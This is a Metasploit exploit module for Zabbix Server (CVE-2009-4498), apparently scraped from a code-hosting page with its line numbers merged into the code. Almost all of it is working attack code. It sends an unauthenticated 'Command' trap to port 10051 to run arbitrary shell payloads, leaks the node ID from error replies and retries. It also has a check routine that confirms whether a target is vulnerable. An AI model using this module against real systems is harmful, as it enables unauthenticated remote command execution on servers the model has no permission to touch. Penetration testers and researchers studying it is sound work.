Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/linux/misc/zabbix_server_exec.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'Zabbix Server Arbitrary Command Execution',13'Description' => %q{14This module abuses the "Command" trap in Zabbix Server to execute arbitrary15commands without authentication. By default the Node ID "0" is used, if it doesn't16work, the Node ID is leaked from the error message and exploitation retried.1718According to the vendor versions prior to 1.6.9 are vulnerable. The vulnerability19has been successfully tested on Zabbix Server 1.6.7 on Ubuntu 10.04.20},21'Author' =>22[23'Nicob <nicob[at]nicob.net>', # Vulnerability discovery24'juan vazquez' # Metasploit module25],26'License' => MSF_LICENSE,27'References' =>28[29[ 'CVE', '2009-4498' ],30[ 'OSVDB', '60965' ],31[ 'BID', '37989' ],32[ 'EDB', '10432' ],33[ 'URL', 'https://support.zabbix.com/browse/ZBX-1030' ]34],35'Platform' => ['unix'],36'Arch' => ARCH_CMD,37'Privileged' => false,38'Payload' =>39{40'DisableNops' => true,41'Compat' =>42{43'PayloadType' => 'cmd',44'RequiredCmd' => 'generic telnet',45# *_perl, *_python and *_ruby work if they are installed46}47},48'Targets' =>49[50[ 'Zabbix 1.6.7', { } ]51],52'DefaultTarget' => 0,53'DisclosureDate' => 'Sep 10 2009'54))5556register_options(57[58Opt::RPORT(10051),59])60end6162def send_command(sock, node_id, cmd)63host_id = Rex::Text.rand_text_numeric(3)64msg = "Command\255"65msg << "#{node_id}\255"66msg << "#{host_id}\255"67msg << "#{cmd}\n"68sock.put(msg)69res = sock.get_once70return res71end7273def check74peer = "#{rhost}:#{rport}"75node_id = 076clue = Rex::Text.rand_text_alpha(rand(5)+5)77cmd = "echo #{clue}"7879connect80vprint_status("Sending 'Command' request...")81res = send_command(sock, node_id, cmd)82disconnect8384if res85vprint_status(res)86if res =~ /#{clue}/87return Exploit::CheckCode::Vulnerable88elsif res =~ /-1/ and res=~ /NODE (\d*)/89node_id = $190vprint_good("Node ID #{node_id} discovered")91else92return Exploit::CheckCode::Safe93end94else # No response95return Exploit::CheckCode::Safe96end9798# Retry with the good node_id99connect100vprint_status("Sending 'Command' request with discovered Node ID...")101res = send_command(sock, node_id, cmd)102disconnect103if res and res =~ /#{clue}/104return Exploit::CheckCode::Vulnerable105end106return Exploit::CheckCode::Safe107end108109def exploit110peer = "#{rhost}:#{rport}"111node_id = 0112cmd = payload.encoded113114connect115print_status("Sending 'Command' request...")116res = send_command(sock, node_id, cmd)117disconnect118119if res and res =~ /-1/ and res=~ /NODE (\d*)/120# Retry with the good node_id121node_id = $1122print_good("Node ID #{node_id} discovered")123connect124print_status("Sending 'Command' request with discovered Node ID...")125res = send_command(sock, node_id, cmd)126disconnect127end128129# Read command output from socket if cmd/unix/generic payload was used130if (datastore['CMD'])131if res and res =~ /\x30\xad/132print_good("Command executed successfully")133print_status("Output:\n#{res.split("\x30\xad").last}")134else135print_error("Failed to execute the command")136end137end138139end140end141142143